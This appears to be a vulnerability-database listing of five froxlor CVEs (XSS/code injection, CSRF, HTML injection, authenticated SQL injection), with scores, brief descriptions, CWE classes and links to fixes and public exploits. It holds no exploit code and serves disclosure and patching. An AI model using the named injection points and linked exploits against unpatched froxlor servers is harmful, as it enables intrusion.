CVSS: 6.5EPSS: 1%CPEs: 1EXPL: 1CVE-2022-3869 – Code Injection in froxlor/froxlor
https://notcve.org/view.php?id=CVE-2022-3869
Code Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2. Inyección de Código en el repositorio de GitHub froxlor/froxlor anterior a 0.10.38.2. • https://github.com/froxlor/froxlor/commit/3f10a4adede9df83408d60ded78b51b812a763a8 https://huntr.dev/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 7.6EPSS: 0%CPEs: 1EXPL: 0CVE-2022-3721 – Code Injection in froxlor/froxlor
https://notcve.org/view.php?id=CVE-2022-3721
Code Injection in GitHub repository froxlor/froxlor prior to 0.10.39. Inyección de código en el repositorio de GitHub froxlor/froxlor anterior a la versión 0.10.39. • https://github.com/froxlor/froxlor/commit/1182453c18a83309a3470b2775c148ede740806c https://huntr.dev/bounties/a3c506f0-5f8a-4eaa-b8cc-46fb9e35cf7a • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 1CVE-2022-3017 – Cross-Site Request Forgery (CSRF) in froxlor/froxlor
https://notcve.org/view.php?id=CVE-2022-3017
Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 0.10.38. Una vulnerabilidad de tipo Cross-Site Request Forgery (CSRF) en el repositorio de GitHub froxlor/froxlor versiones anteriores a 0.10.38. • https://github.com/froxlor/froxlor/commit/bbe82286aae21328668f24857995a67598fe978a https://huntr.dev/bounties/5250c4b1-132b-4da6-9bd6-db36cb56bea0 • CWE-352: Cross-Site Request Forgery (CSRF) •
CVSS: 6.1EPSS: 0%CPEs: 1EXPL: 1CVE-2020-29653
https://notcve.org/view.php?id=CVE-2020-29653
Froxlor through 0.10.22 does not perform validation on user input passed in the customermail GET parameter. The value of this parameter is reflected in the login webpage, allowing the injection of arbitrary HTML tags. Froxlor versiones hasta 0.10.22, no lleva a cabo una comprobación de las entradas del usuario pasadas en el parámetro GET de customermail. El valor de este parámetro es reflejado en la página web de inicio de sesión, permitiendo una inyección de etiquetas HTML arbitrarias • https://github.com/Froxlor/Froxlor/commits/master https://github.com/Froxlor/Froxlor/security/advisories https://nozero.io/en/cve-2020-29653-froxlor-html-injection-dangling-markup • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 2CVE-2021-42325 – Froxlor 0.10.29.1 - SQL Injection (Authenticated)
https://notcve.org/view.php?id=CVE-2021-42325
Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name. Froxlor versiones hasta 0.10.29.1, permite una inyección SQL en el archivo Database/Manager/DbManagerMySQL.php por medio de un nombre de base de datos personalizado Froxlor version 0.10.2l9.1 suffers from a remote SQL injection vulnerability that can enable an attacker to achieve remote code execution. • https://www.exploit-db.com/exploits/50502 https://github.com/AK-blank/CVE-2021-42325- http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •